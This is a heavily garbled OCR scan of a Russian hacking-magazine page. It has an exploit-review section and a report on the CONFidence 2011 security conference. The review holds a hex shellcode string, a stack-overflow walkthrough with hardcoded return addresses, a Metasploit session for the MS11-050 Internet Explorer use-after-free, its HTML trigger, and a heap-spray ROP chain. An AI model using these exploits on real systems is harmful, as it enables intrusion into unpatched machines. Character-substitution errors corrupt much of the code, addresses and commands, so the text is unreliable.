"\х6а\х4е\х6Ь\х47\х62\х5а\х4Ь\х4-р\х76\х43\х6сІ\х50\х6а\х47" . 
"\х71\х4с\х4сІ\х4е\х65\х58\х39\х43\х30\х43\х30\х45\х50\х52" . 
"\х70\х51\х78\х50\х31\х4с\х4Ь\х52\х4-Р\х4-Р\х77\х4Ь\х4-Р\х49" . 
"\х45\х4-р\х4Ь\х4с\х30\х4с\х75\х4с\х62\х43\х66\х43\х58\х4с" . 
"\х66\х4с\х55\х4сІ\х6сІ\х4-р\х6сІ\х4Ь\х4-р\х4е\х35\х47\х4с\х43" . 
"\х36\х43\х4с\х54\х4а\х4Ь\х30\х4Ь\х4Ь\х4сІ\х30\х52\х55\х45" . 
"\х55\х4-Р\х4Ь\х50\х47\х52\хЗЗ\х51\х62\х50\х6-р\х52\х4а\х43" . 
"\х30\х56\хЗЗ\х4Ь\х4-Р\х4Ь\х65\х45\хЗЗ\х50\х61\х52\х4с\х50" . 
"\х63\х56\х4е\х43\х55\х50\х78\х52\х45\х47\х70\х41\х41"; 

Вставляем данное добро в скриптХі1;аппі2_5Ь4.р[, генерирующий 
рабочий эксплоит, поднимаем сервер, запускаем скрипт, вбиваем ір- 
адрес сервака и наблюдаем возникающий из ниоткуда кулькулятор. Ну 
атеперьнемного подробней. Перезапись стека происходитна вызове 
функции _55сапб 

. 1:ех1: : 0042А38О ризЬ еах 
.1:ех1::0042А38Е Іеа есіх^ [е5р+7СІі+ѵаг_58] 

.1;ех1::0042А392 ризіі есх 
.1;ех1;:0042А393 ризіі есіх 

.1:ех1;:0042А394 ризіі О-Р-Рзеі; аОБОООО ; "%6 %з %6 %6:%6:%6" 
.1;ех1;:0042А399 

.1;ех1;:0042А399 1ос_42А399: ; СООЕХКЕР: 5иЬ_42А1Р0+10В#] 
.1;ех1::0042А399 ризЬ есіі ; 5гс 
.1;ех1::0042А39А саіі _55сап-р; < — атата 
.1;ех1::0042А39Р тоѵ есх^ [е5р+8СІі+ѵаг_5С] 

.1;ех1;:0042АЗАЗ асісі езр^ 206 



Таким образом стек выглядит после перезаписи (видим стандартную 
АААА..., начинающуюся с адреса 0х00с81'ее8): 

00С8РЕА4 00А27С57 1лі|у. А5СІІ 41/'АААААААААААААААААААААААААА 
ААААААААААААААААААААААААААААААААААААААА" 

00С8РЕА8 004922Р4 ф"І. А5СІІ "%5 %с1 %с1 :%с1 :%с1 %с1" 

00С8РЕАС 00С8РЕЕ8 июИ. А5СІІ 41/'ААААААААААААААААААААААААА 
АААААААААААААААААААААААААААААААААААААААА" 



00С8РЕВ0 


00С8РЕО8 


ШюИ. 


00С8РЕВ4 


00С8РЕОС 


ЬюИ. 


00С8РЕВ8 


00С8РЕЕ0 


аюИ. 


00С8РЕВС 


00С8РЕЕ4 


дюИ. 


00С8РЕС0 


00С8РЕО4 


ФюИ. 


00С8РЕС4 


00А0Р2А8 


Ёт . 


00С8РЕС8 


00А184ОС 


Ь"У. 


00С8РЕСС 


00000001 


#. . . 


00С8РЕО0 


00000000 




00С8РЕО4 


00000000 




00С8РЕО8 


00000000 




00С8РЕОС 


00000000 




00С8РЕЕ0 


00000000 




00С8РЕЕ4 


00000000 




00С8РЕЕ8 


41414141 


АААА 


00С8РЕЕС 


41414141 


АААА 


00С8РЕР0 


41414141 


АААА 


00С8РЕР4 


41414141 


АААА 



Сразу же после всех этих ААААА... будет располагаться адрес воз- 
врата, которым мы переписали первоначальный адрес возврата. Так 
какв данном варианте эксплоита не ставится целью обход ВЕР’а, то 
и управление в дальнейшем нам надо будет передавать на стек. По- 
сему необходимо искать что-то наподобие ризб езр — геТ 
Сразу краткое замечание по поводу кода эксплоита. Необходимо 
внимательней смотреть на адрес, которым будет перетираться ориги- 
нальный, поскольку все это хардкод. На моей системе адрес ризб езр 
— геі; немного отличался от авторского: 

$КЕТ = "\х53\х2Ь\хаЬ\х71"; 

# Ы 52 _ 32 .с 111 ризб Е5Р - ге1: - (ілііпсіоыб ХР 5РЗ - [Еп] ) . 

На моей системе: 

$КЕТ = "\х53\х2Ь\ха9\х71"; 

Посмотреть данные адреса можно либо простым поиском по опкодам 
0x54, ОхсЗ (ризб езр — геіп), либо при помощи плагина кІттПЬд под 
названием рѵебпбасісіг. Каким образом использовать рѵебпбасісіг, можно 
узнать при помощи команды !изаде рѵебпбасісігс дальнейшим созерца- 
нием результатов исполнения вышеприведенной команды в окне логов 
ІтппПЬд. 

После того как мы дойдем до последнего геСа, на вершине стека будет 
лежать адрес 0x71 а92Ь53. Исполняется геіп, далее выполняются ко- 
манды ризб езр — геіп, мы прыгаем на пор-цепочку, по которой в конце 
концов добираемся до полезной нагрузки. 
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взлом 



ТАК6ЕТ5 



ХКаті 2.5Ь4 



ЕХРЮІТ8 I 
КЕѴІЕѴѴ , 

ЕХРЮІТ5 
РЕѴІЕѴѴ 




Получение вредоносных данных от клиента 



50ШТІ0М 



Обновиться до более свежей версии 




М511-050ІЕ 

М5НТМ^!СОВ^ЕСТЕ^ЕМЕNТ У5Е 
АРТЕРРРЕЕ 



СѴ55Ѵ2 



9.3(АѴ:М/АС:М/Аи:М/С:С/І:С/А:С) 

Очередная уязвимость в Іпіегпеі; Ехріогег 7-8. Эксплоит был 
оформлен автором в виде модуля для Меіазріоіі;. Данный модуль 
эксплуатирует уязвим ость типа изе-аі'іег-і'гее, достигаемую в 
том случае, когда задан неверный тэг <оЬ]'ес1;> и другие элементы 
перекрывают собой на экране то место, где тэг объекта должен 
был бы оказаться после генерации. В результате невалидности 
элемента М5Ы;ппи00Ь]ес1;Е[еппеп1;, происходит его освобождение 
в памяти. Однако, объект тзЫтИСВізрІау для страницы про- 
должает хранить ссылку на освобожденный <оЬ]'ес1;> и пытается 
вызывать функции, в аргументах к которым будетуказан данный 
освобожденный элемент, что, собственно, и приводит к уязвимо- 
сти типа изе-аі'іег-і'гее. 

Справку по использованию эксплоита можно получить при по- 
мощи стандартной команды Меіазріоіі; «збоѵѵ орііопз». Вот пример 
использования этого сплоита: 

ГП5-Р > 

изе ехр1оі1;/ыіпсІоы5/Ьгоы5ег/т5І1_050_т5ІтІ;т1_соЬ]ес1;е1етеп1; 

ГП5-Р ехр1оі1;(...) > зеі; 5КѴН05Т 192.168.0.63 

5КѴН05Т => 192.168.0.63 

ГП5-Р ехр1оі1;(...) > зеі: РАУІОАО ыіпсІоы5/ехес 

РАУІОАО => ыіпсІоы5/ехес 

ГП5-Р ехр1оі1;(...) > зеі: СМО саіс.ехе 

СМО => саіс.ехе 

ГП5-Р ехр1оі1;(...) > ехріоіі: 

[*] Ехріоіі; гиппіп§ аз Ьаск§гоипсІ ]оЬ. 

[*] изіп§ икі: Іі1;1;р : //192. 168.0. 63 :8080/Ь61;ЗыЕВКз 

[*] Бегѵег зіагіесі. 

тз-Р ехріоіі; (тз11_050_тзІі1;т1_соЬ]ес1;е1етеп1;) > 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 



зайти в ВеѵерегТооІз и посмотреть на текущее состояние ВОМ, 
элемент <оЬ]'ес1;> показываться не будет, скорее всего, потому, что 
не был указан тип объекта, который у него должен быть: 

<Іі1;т1> 

<ЬосІу> 

кзсгірі; 1ап§иа§е=']аѵазсгір1;' > 
сІоситепі.ЬосІу.іппегНТМІ += "<оЬ]'ес1; а1і§п= ' гі§Іі1; ' 
Іізрасе='1000' ыісІ1;Іі= ' 1000 ' >ТА6_1</оЬ]ес1;>"; 

// сІоситепі.ЬосІу.іппегНТМІ += "<а ісІ='1;а§_3' зіу1е='Ь 
оііот : 200ст;Яоа1; : Іе-Рі;; расісііп§-1е1^1; : -1000рх; Ьогсіег- 
ыісІ1;Іі:2000рх;1;ех1;-іпсІеп1;: -1000рх' >ТА6_3</а>"; 
сІоситепі.ЬосІу.іппегНТМІ += "ААААААА"; 
сІоситепі.ЬосІу.іппегНТМІ += "<з1;гоп§ зіу1е= 
'1^оп1;-зІ2е:1000рс;таг§іп:аи1;о -1000ст аиіо аиіо; ' 
сІіг= ' ІІГ ' >ТА6_11</з1;гоп§>"; 

</зсгір1;> 

</ЬосІу> 

</Іі1;т1> 

Зная это, вскинем свой взор на стек вызовов, полученный после 
падения, это должно пояснить нам суть остального: 

0:008> к 

СбіІсІЕВР КеіАсІсІг 

020Ье350 63602718 тзІіітІІСЕІетепІ;: :Оос+0х2 
020Ье36с 636026а3 тзI^1;т1!СТгееNосIе: :Сотри1;еРоптіа1;з+0хЬ9 
020Ье618 63612а85 тзІіітІІСТгееМосІе: :Сотри1;еРогта1;зНе1рег+0х44 
020Ье628 63612а45 тзI^1;т1!СТгееNосIе: :Се1;РапсуРогта1;ІпсІехНе1рег 

+0x11 

020Ье638 63612а2с тзI^1;т1!СТгееNосIе: :Се1;РапсуРогта1;Не1рег+0х1= 
020Ье64с 637с129аЬ тзІіітІІСТгееМосІе: :6е1;РапсуРогта1;+0х35 
020Ье654 637СІ2906 тзРіітІ ! СІіпеСоге: :АО_Се1;РапсуРоптіа1;+0х23 
020Ье688 63675с93 тзІіітІІСКесаІсІіпеРіг: : Кеса1сМаг§іпз+0х19сІ 
020Ьее80 6369985-Р тзІіітІІСОізрІау: : Кеса1сІіпез+0х6е4 
020Ье1^5с 636ІС037 тзІіітІІСОізрІау : :1лІаі1;РогКеса1с+0х208 
020Ье1^ас 636514сіе шзІіітІІСРІоыІауоиІ;: :Мо1;і1^у+0х7сІ7 
020Ье1=Ь8 6360171=2 тзІі1;т1!Мо1;і1=уЕ1етеп1;+0х41 
020Ы=00с 63651341= тзІіітІІШагкир: :5епсІМо1;іРіса1;іоп+0х60 
020Ы=034 бЗбббЬсІ тзІіітІІШагкир: :Nо1;і1=у+0xсI4 
020Ы=07с 6361Ы=07 тзІіітІІСЕІетепІ;: :5епсІМо1;іРіса1;іоп+0х4а 
020Ы=0а0 635сІ82Ь7 тзІіітІІСЕІетепІ;: : ЕпзигеКесаІсМоііІ^у +0x151= 
020Ы=11с 635сс225 тзІіітІІСОізрІауРоіпіег: :МоѵеІІпі1;+0х2Ь2 
020Ы=208 635СС092 тзІіітІІСНТМІЕсІііог: :АсІзиз1;Роіп1;ег+0х161= 
020Ы=23с 635ссІ2а1= тзРіітИСЕсІііТгаскег: іАсІзизіРоіпіегРогІпзегІ; 

+0х8Ь 

020Ы=298 635ССІ123 тзРіітІ ! ССагеіТгаскег: :Розі1;іопСаге1;А1;+0х141 

Основным моментом, который приводит к падению, является то, 
что элемент <оЬ]'ес1;> был первоначально добавлен в некий список 
элементов, чтобы быть отображенным. Затем элемент оЬ]'ес1; был 
удален, поскольку стал невалидным, и стало нечего отображать. 

Но он не был удален извышеобозначенногосписка. Далее должно 
произойти нечто, в результате чего ІЕ попытается вызвать метод 
на освобожденном объекте, что и приведет к изе-аі'іег-і'гее. 

То есть по сути, нам необходимо инициировать освобождение эле- 
мента <оЬ]'ес1;>, получитьуказатель на данные, которые мы контро- 
лируем для того, чтобы перезаписать ими освобожденный объект, а 
затем сделать то, что может привести к вызову функций с элементом 
оЬ]'ес1; в качестве одного из аргументов. 

Эксплоит для ІЕ7 и ІЕ8 с отключенным ОЕР перезаписывает 
С0Ь]'ес1;Е[еппеп1; значениями ОсОсОсОс: 



Проходим по ссылке на клиенте (бир://1 92.1 68.0.63:8080/ 
ЬбіЗѵѵЕВК]) и видим возникающий калькулятор. Если закомменти- 
ровать один из тегов в тесте (дабы уберечь ІЕ от падения), а затем 



ШБІіітІ ! СЕІетепІ; : : Оос : 

Зс1=76Ь80 8Ь01 тоѵ еах^сіыогсі ріг [есх] 
; сІ5:0023:1471=00а7=0с0с0с0с 
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ЕХРЮІТ8 




КЕѴІЕѴѴ 



0:007> и сотс1;132!СІта§еІІ5І:: :_І55атеОЬ]ес1;+40 1?2 
сотс1;132 ! СІта§еІІ5І: : :_І55атеОЬ]ес1;+0х40: 

773еЗ-Рі8 94 хсІі§ еах^езр ; езр == 0с0с0с0с 
773е3-р19 сЗ ге1: ; возврат в кегпе132 ! Ѵіг1;иа1А11ос 

После да иных телодвижений РОР- последовательность будет вы- 
глядеть следующим образом: 

0С0С0СІ0 7с901с1ЬЗ ; 2:п1:с111!тетсру 
(второй возврат) 

0С0С0СІ4 7-Р000000 ; 1:Ѵіг1:иа1А11ос : ІрАсІсІгеББ 
0С0С0СІ8 00004000 ; 1:Ѵіг1:иа1А11ос :сІы5І2е 
0С0С0СІС 00003000 ; 1:Ѵіг1:иа1А11ос :ПА11оса1:іопТуре МЕМ_ 
СОтіТ I МЕМ_КЕ5ЕКѴЕ 



ЗсР76Ь82 8Ь5070 тоѵ есIx^сIыогсI р1;г [еах+701і] 

; сі5:0023:0с0с0с7с=0с0с0с0с 
Зс-Р76Ь85 -Р-РСІ2 саіі есіх 

; {<ІІп1оасІесІ_55рс .сІ11>+0хс0с0с0Ь (0с0с0с0с)} 

; <-- (исполнение цепочки порз + зііеіісосіе) 

ЗсР76Ь87 8Ь400с тоѵ еах^сіыогсі р1;г [еах+0СІі] 

ЗсР76Ь8а сЗ ге1: 

Эксплоит для ІЕ8 с включенным ПЕР требует применения техники 
РОР- программирования: 

1 . С0Ь]'ес1;Е[еппеп1; перезаписывается значениями ОсОсОсОс; 

2 . Используя Ьеар-зргау, помещаем РОР-последовательность по 
адресу ОсОсОсОс; 

3 . По адресу 0x23000000 размещается цепочка порз+зЬеНсосІе. 

Как только все будет выполнено, РОР-последовательность примет 

следующий ВИД: 



0С0С0С0С 7с809а-Рі ; 1:кегпе132!Ѵіг1:иа1А11ос (первый возврат) 
0С0С0СІ0 7с901с1ЬЗ ; 2:п1;с111!тетсру (второй возврат) 

0С0С0СІ4 7-Р000000 ; 1:Ѵіг1;иа1А11ос:1рАсІсІге55 

0С0С0СІ8 00004000 ; 1:Ѵіг1;иа1А11ос :сІы5І2е 

0С0С0СІС 00003000 ; 1:Ѵіг1:иа1А11ос:11А11оса1;іопТуре МЕМ_ 



СОтіТ I МЕМ_КЕ5ЕКѴЕ 

0С0С0С20 00000040 ; 1:Ѵіг1:иа1А11ос:11Рго1:ес1: гых 
0С0С0С24 7-Р001000 ; 3 : пор5+5Ііе11сосІе (третий возврат) 
0С0С0С28 7-Р001000 ; 2:тетсру:сІ5І; 

0с0с0с2с 23000100 ; 2:тетсру:згс 
0С0С0С30 00002-р-р-р ; 2:тетсру : 5І2е 
0С0С0С34 Ье9е2688 ; мусор 



0С0С0С74 сІе2-Рб2е1 ; мусор 
0С0С0С78 а19314еЬ ; мусор 

0с0с0с7с 773еЗ-Рі8 ; сотс1;132 ! СІта§еІІ5І; : :_І55атеОЬ]ес1;+0х40 



0С0С0С20 00000040 ; 1:Ѵіг1:иа1А11ос :ПРго1:ес1; гых 
0С0С0С24 7-Р001000 ; 3 : порз+зііеіісосіе (третий возврат) 

0С0С0С28 7-Р001000 ; 2:тетсру :сІ5І; 

0с0с0с2с 23000100 ; 2:тетсру:згс 
0С0С0С30 00002-р-р-р ; 2:тетсру:5І2е 

В кегпеІЗЗІѴігІиаІАНос выделяется 0x4000 байт с атрибутами 
чтение/запись/исполнение по адресу ОхУШООООО, и мы возвраща- 
емся в пІбШтетсру. На данном этапе стек выглядит следующим 
образом: 

0С0С0С24 7-Р001000 ; 3 : порз+зііеіісосіе (третий возврат) 

0С0С0С28 7-Р001000 ; 2:тетсру :сІ5І: 

0с0с0с2с 23000100 ; 2:тетсру:5гс 
0С0С0С30 00002-р-р-р ; 2:тетсру : 5І2е 

пЮШтетсру затем скопирует ОхЗІ'І'І' байт из 0x23000100 (по 
данному адресу находится цепочка по рз + збеИсобе) по адресу 
ОхУШОІ 000 (гѵѵх-память, была выше выделена ѴігІиаІДиос'ом) и 
вернет управление на цепочку порз + збеИсобе, располагающуюся 
по адресу ОхУШОІ 000: 



ПІІСІ11 Ітетсру: 
7с901с1ЬЗ 55 
7с901с1Ь4 8Ьес 
7с901с1Ь6 57 
7с901с1Ь7 56 
7с901с1Ь8 8Ь750 



ризіі еЬр 
тоѵ еЬр^е5р 
ризРі есіі 
ризРі езі 

стоѵ е5І^сIыогсI р1;г [еЬр+0СІі] 
; 5б:0023:0с0с0с2с=23000100 
7с901сІЬЬ 8Ь4сІ10 тоѵ есх^сіыогсі р1;г [еЬр+10Іі] 
; 5б:0023:0с0с0с30=00002-Р-Р-Р 
7с901сІЬе 8Ь7сІ08 тоѵ есіі^сіыогсі р1;г [еЬр+8] 

: 5б:0023:0с0с0с28=7-Р001000 



; указатель стека 
0С0С0С80 3825а2сІ7 ; мусор 
0С0С0С84 88-Р8а84сІ ; мусор 
0С0С0С88 05666421 ; мусор 



7с901сІе6 -Р3а5 гер тоѵз сіыогсі р1;г ез : [есІі] ^сіыогсі р1:г [езі] 
; скопировать порз+збеіісосіе по адресу 0х7-р001000 



Момент вызова тзЫ;ппиСЕ[еппепІ::Вос после данного события: 



тзІтРтІ ! СЕІетепІ; : : Оос : 

Зс-Р76Ь80 8Ь01 тоѵ еах^сіыогсі р1;г [есх] 

; сіз:0023:35а00002=0с0с0с0с 
Зс-Р76Ь82 865070 тоѵ есIx^сIыогсI р1;г [еах+706] 

; сІз:0023:0с0с0с7с=773еЗ-Р18 
ЗС-Р76685 -р-РсІ2 саіі есІх ; указатель стека 
; {сотс1:132!СІта§еІіз1:: :_Із5атеО6]ес1:+0х40 (773е3-р18)} 



7с901-Р4сІ с9 Іеаѵе 

7с901-Р4е сЗ ге1: 

; возврат по адресу 7-Р001000 (попадаем на 
; цепочку порз + збеіісосіе) 



ТАРСЕТ5 



Іпіегпеі; ЕхрІогегУ-8 



Первая часть РОР-последовательности представляет из себя 
указатель на код, производящий обмен езр с еах (ОсОсОсОс): 



50ШТІ0М 



Поставить обновления. -и- 
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СОМНОЕНСЕ 2011 

Отчет о хакерской конференции 
в Польше из первых рук 



@ СОМРісІепсе - уникальное событие по своей атмосфере и 
открытости. Помимо именитых докладчиков, здесь всегда ждут 
новыхлюдей, которые готовы представить результаты интересных 
исследований в области ИБ. Единственное ограничение - 
выступление должно будоражить разум не только докладчика, но и 
быть интересно присутствующим. 

От редакции: 

Конференция СОМРісІепсе как обычно прошла в 20-х числах мая в 
прекрасном польском городе Кракове. Она давно уже зарекомен- 
довала себя как лучшее событие ІТ-зесигіІу в Восточной Европе, 
да и чего таить — это одно из лучших хак-событий Европы вообіде 
(наряду с Віаск Нар НІТВ, НазЬВауз, 500ІРСЕ, ВгиСоп, ВеерЗЕС). 

За пять лет докладчиками на этой конференции были такие люди, 
как Брюс Шнайер, Дэн Камински, Джоанна Рутковская, Якоб 
Аппелбаум, Антон Чувакин и многие другие. А в этом году с докла- 
дами приехали двое наших авторов — Алексей Синцов и Саша 
Матросов, выступавший со своим коллегой из Е5ЕТ Евгением 
Родионовым. И хотя мы редакцией и сами съездили посмотреть на 
это чумовое действие, отчет о СОМЕібепсе предложили написать 
непосредственно участникам событий. Так что то, какой конферен- 
цию увидел Леша Синцов, и комментарии Саши Матросова читай 
ниже. 



Атмосфера 

Первое, что хочется сказать: на мероприятии присутствует некая 
«живая» хакерская атмосфера, что позволяет нам, как докладчи- 
кам, так и посетителям, очень душевно пообідаться друг с другом 
в «неофициальной» обстановке :). Сама конференция проходила 
в комплексе водонапорной станции, открытой в еіде 1901 году, так 
что антураж в стиле «индастриал» помог разнообразить обідее 
впечатление. Мероприятия подобного рода в большинстве своем 
проходят в скучных кондиционируемых залах отелей, а тут выбра- 
но очень правильное место. Стоит к этому добавить, что террито- 
рия конференции не ограничивалась только помеідениями: сюда 
также входила и зона под открытом небом, где были организова- 
ны всякого рода спортивные игры (волейбол, футбол), установ- 
лены удобные тенты и готовились вкусности вроде мяса гриль 
и шашлыков (к слову, на польском это блюдо называется точно 
так же). Конечно, не обошлось без привычных для данного меро- 
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приятия атрибутов — игровых консолей, старых игр, 
и, само собой, хакерских соревнований. Проводились 
и просто «алко-трешовые» конкурсы, вроде такого: 
кто полуголым пробежит по сцене во время доклада... 
Александру Матросову и Евгению Родионову повезло, 
ведь именно во время их выступления кто-то выпол- 
нил эту«ачивку» :). Были и классические конкурсы, 
вроде СгаскМе и РеѵегзеМе или «обойди Тірріпд Роіпі 
ІР5». Кстати, Е5ЕТ уже на протяжении многих лет 
является спонсором этого мероприятия и традиционно 
разрабатывает для него специальный крякми. К сожа- 
лению, в этом году не нашлось ни одного человека, 
который смог бы пройти его полностью. До сих пор он 
доступен онлайн и ты можешь испытать себя [ 201 1 . 
сопбсІепсе.огд.р[/ппІ5с/СгаскМеЛогсе64.ех ]. «Видимо, 
просто на этот раз не было Димы Склярова, который 
уже традиционно занимает все первые места на 
наших конкурсах», — шутит Саша Матросов. Короче 
говоря, СОМЕісІепсе 2011 отметилась всем, без чего ни 
одна добротная хакерская конференция обойтись не 
может. Тем не менее, на таких ивентах самое главное 
— это доклады, так что поговорим о них подробнее. 

Доклады 

■ Сетевая безопасность — с нулевого уровня 
Уоиг Ме^ѵогк Бесигііу БІагІз аі Іауег 7.ею 
Докладчики: Девиант Оллам, Бабак Джавади 

Этот доклад, который перешел в воркшоп от американ- 
ских пен-тестеров, был на открытии. Пен -тестеры-то не 
простые. Они занимаются проникновением на физи- 
ческом уровне, то есть проверяют качество замков, 
пытаясь вскрыть их, не разрушая механизма дверей, 
петель или стен. Очевидно, что большинство воров про- 
сто высверливают замки, не заботясь о скрытности. Но 
вот если следов разрушения нет, значит ли это, что твою 
дверь не открывали? Значит ли это, что твой яідик в 



офисе был закрыт и недоступен, пока ты был на обеде 
или дома? Вообіде говоря, если камер нет — то это не 
очевидно. А учитывая, как некоторые компании экономят 
не только на замках от офисных дверей, яідиков столов 
или личных шкафчиков, но и на замках от ідитовых 
[где счетчики, или рубильники, или управление про- 
чих коммуникаций), то такие пен-тесты показывают, что 
потенциальный нарушитель может получить физический Все презентации 
доступ так, что об этом еіде долго никто не узнает. В СОМЕісІепсе 201 1 ты 

любом случае, доклад был зрелиідный и интересный, найдешь на нашем 
хотя и не новый. Но ребята также рассказали и о новых ВѴВ. 
замках, которые они сейчас пытаются вскрыть, и судя по 
прогрессу — они будут, все же, взломаны :). Эти ребя- 
та — большие любители устраивать конкурсы по взлому 
замков, и были замечены на многих других конференци- 
ях, таких как Екорагіу, к примеру. А на их сайте [ беѵіабпд. 
пеіЛоскріскіпд/едиірппепІ.ЫппІ ] можно прикупить раз- 
личные наборы отмычек, и, с их собственных слов, они 
без проблем готовы их доставить почтой, в том числе и 
в Россию. После доклада любой желаюідий мог попро- 
бовать повскрывать замки [и наручники) разными мето- 
дами — отмычками, специальным ключом и молоточком 
и даже пивной банкой! Кроме того был организован 
конкурс на тему взлома замков: на участника одевали 
наручники, он должен был открыть все замки и снять 
наручники. Победил в этом конкурсе Репбегтап, извест- 
ный в «узких» кругах канадский хакер, чуть ли не посто- 
янный спикер на □еі'соп’е. Он менее чем за минуту снял 
наручники [которые, кстати, были надеты «за спиной»), 
после чего открыл все замки. 

■ Запрещенное изображение: аспект безопасно- 
сти 5ѴО в вебе 

ТИе ТогЬісІсІеп іітіаде — Зесигііу іппрасі о! БсаІаЫе 
Ѵесіог ОгарЫсз оп ІИе ѴѴѴѴѴѴ 
Докладчики: Марио Хейдерич 




> СІѴСІ 
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взлом 



Алексей Синцов из ОідіІаІ Зесигііу со своей женой Светланой 



Доклад Марио был посвящен скрытому и опасному потенциалу в 
формате 5Ѵ0. Собственно Марио (ведущий разработчик РНР-Ю5 и 
фанат кошек) рассказал про формат 5Ѵ0, про то, как в его телесах 
можно запрятать хитрую Х85, используя спецификацию протокола. 
Все это открывает дорогу для реализации атак там, где, например, 
в лоб не пройти (как, например, в случае, когда мешают Ю5 или 
ѴѴАР). 

■ Взлом птицы в небе: месть Апдгу Вігсіз 
Наскіпд а ВігсІ іп ІИе 5ку: ТИе Реѵепде о! Апдгу Вігсіз 
Докладчики: Джим Геоведи, Рауль «МоЬосІу» Чьеса 

Веселый доклад Джима и Рауля о методах взлома спутников, а точ- 
нее о проблемах безопасности, которые имеют место быть в этой 
области. Да, так просто. Вообще есть серия докладов на эту тему, от 
того же Джима и других авторов, но данный доклад был про спец- 
ифику «наземной» службы и ее проблемы: халатность, устаревшее 
ПО (например, по причинам совместимости, многое ПО работает на 
ооочень старых версиях 00, вроде ѴѴіпМТ 4.0 в центрах управле- 
ния), отсутствие шифрования ІР-канала (шифрование увеличивает 
объем и нагрузку, поэтому де-факто — оно поддерживается, но, как 
правило, выключено). Помимо теории, Джим показал несколько 
демонстраций, как ему удалось внедриться в протокол общения 
между спутником и командным центром, показал наглядные видео 
и картинки: от основ ТОМА до спецификаций протоколов. В общем, 
интересная презентация (скорее даже не слайды интересны, а 
то, что говорили докладчики) от интересных людей. Кто не знает 
Рауля,— этот старый хакер вторгся в сеть Банка Италии, за что был 
арестован :). Какой утверждает, все взломы были ради любопыт- 
ства и интереса — теперь у него своя ІТ-зесигіІу фирма, которая 
оказывает разного рода услуги тем же банкам! Также у них своя 
лаба, где они пишут эксплоиты и проводят исследования. Ребята 
правильные: выступают на конференциях и дают о себе знать 
делом, а не красуются за сухими стендами и сертификатами (хотя 
без этого, не могу соврать, никуда). 

■ Современная эксплуатация кучи через Іоѵѵ Ргадтепіаііоп 
Неар 

Мосіегп Неар Ехріоііаііоп изіпд ІІіе Іоѵѵ Ргадтепіаііоп Неар 

Докладчики: Крис Валасек 

Этот доклад американца (он из Питтсбурга, и, кстати, выра- 
зил радость за победу «земляков» на РНВ СТР в Москве, когда 



Александр поведал ему об этом) ожидали многие. Очень хариз- 
матичная и веселая личность :). Доклад был посвящен защитным 
техникам корпорации Місгозоі'і; от атак по типу переполнения буфера 
в куче. Но что-то я не то сказал, конечно, доклад, как раз наоборот, 
посвящен обходу защиты в последних версиях ѴѴіпсІоѵѵз. Все пока- 
зано было на примере эксплоита для 115 РТР, в котором приуставала 
уязвимость, однако считалось, что захватить контроль (влиять на 
регистр ЕІР) невозможно. Однако Крис использовал новую «фичу»— 
ОРН (Іоѵѵ Ргадтепіабоп Неар). Если эта штука «включена», то воз- 
можно обойти защиты от М5. Осталось только включить эту «штуку», 
что можно сделать, создав большой пул подключений к ЕТР-сервису, 
тогда 00 для эффективности врубает ЕЕН, что используется для 
последующей атаки. Мы можем перезаписывать поле заголовка 
ЕгееЕпІгуОІ'І'зеІ;, и, в конечном счете, перезаписать ЕІР. Все конечно 
намного сложнее, и я описал лишь 5% идеи, но истина где-то рядом. 

■ Победа над х64: эволюция руткита ТОІ 
ОеТеаІіпд х64: ТИе Еѵоіиііоп оі ІИе ТОІ РооМ 
Докладчики: Александр Матросов, Евгений Родионов 

Александр и Евгений рассказали про особенности работы ТВЕ в х64 
системе (ага, ведь надо обойти проверку подписи и РаІсбОиагсІ), про 
заражение МВР и что самое интересное — про то, как обходится 
проверка ОС на наличие подписи у драйвера руткита! В качестве 
жертвы, которую препарировали, использовался нашумевший рут- 
КИТІ0Е4, ставший первым широко распространенным руткитом, 
которому удалось побороть проверку цифровой подписи. Это дей- 
ствительно прикольно и интересно. Особенно порадовали «живые» 
демо-отладки ТОЕ в моменты заражения. 

■ ОМ5 для зла 
□N5 !ог еѵіі 
Докладчики: Алексей Синцов 

Я представил доклад «0М5 Ьг еѵіі», в котором поведал о нестан- 
дартном использовании 0М5-запросов в качестве протокола для 
взаимодействия троянской программы и С&С. Подробнее оста- 
навливаться не буду, потому что весь материал был в недавних 
статьях ][. 

■ Выбираемся из песочниц Місгозой ѴѴіпсІоѵѵз 
Езсаріпд Ргот Місгозой ѴѴіпсІоѵѵз ЗапсІЬохез 
Докладчики: Том Китч 
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На вторые сутки участник соревнований по Іоскріскіпд'у все-таки снял наручники. Об этом объявили по громкой связи 



ГЛПГІПЫГЕ і?ОІІ 



N 



Том — веселый парень из Ѵегігопе, сделал очень познавательный 
доклад на тему песочниц. Он рассказал о типах существующих 
песочниц (штука, которая не дает шеллкоду в захваченном про- 
цессе делать то, что хочется — создавать файлы, открывать 
соединения, выполнять команды и т.д.), как они работают, где 
они применяются, и как из них можно убежать. Главная задача в 
таком контексте — это сделать потенциальный эксплоит макси- 
мально дорогим. То есть, если у нас обычное ПО, то написание 
эксплоита, в случае нахождения уязвимости, сводится к реализа- 
ции триггера уязвимости, обхода ОЕР и А5ГР. Если есть песоч- 
ница, то этого недостаточно, нужно либо эксплуатировать еще 
одну уязвимость в ядре ОС (цена эксплоита растет вдвое, так как 
нужна еще одна бага и еще один эксплоит) или пытаться обойти 
песочницу. И тут все уже зависит от крутизны этой самой песоч- 
ницы. В конце он привел сводную таблицу продуктов и их типы 
песочниц. Круче всех оказалась песочница в Ооодіе Сбготе, так 
как использует все доступные модели для ограничения доступа в 
процессе, дальше идет АсгоЬаІ; Реабег, затем Еіазб, и замыкает 
Ргоіесііоп Мобе в ІЕ8 :). Собственно тема очень интересная и 
познавательная, так может быть стоит ждать об этом статью в ][ 

? Сам Том очень общительный и интересный человек, с которым 
приятно было держать разговор! 

■ Практические атаки на микросхему МС13224 
РгасІісаІ аііаскз оп ІІіе Ргеезсаіе МС13224 2ідВее 5оР 
Докладчики: Трэвис Гуудспид 

Любители рубрики «Фрикинг», этот доклад специально для вас! 
Трэвис Гуудспид — известный хакер «железок», его доклад собрал 
полный зал и фактически завершал конференцию! Было интерес- 
но послушать об аппаратных методах взлома микроконтроллеров. 
Существует такая микросхема — МС13224, которая используется 
для организации беспроводной связи в промышленных системах, 
устройствах и т.д. (например, этот чип использовался в ниндзя- 
бейджах для СеФоп 18). Микросхема МС13224 включает в себя 
32-разрядный микроконтроллер с архитектурой АРМУ, флеш- 
память, трансивер 802.15.4 и многое другое. Так вот, Трэвис сказал 
— вот захотим мы атаковать такое устройство с этой микросхемой 



по радиоканалу: найти багу, написать эксплоит — то что нам для 
этого надо в первую очередь? А надо нам получить код прошивки! 
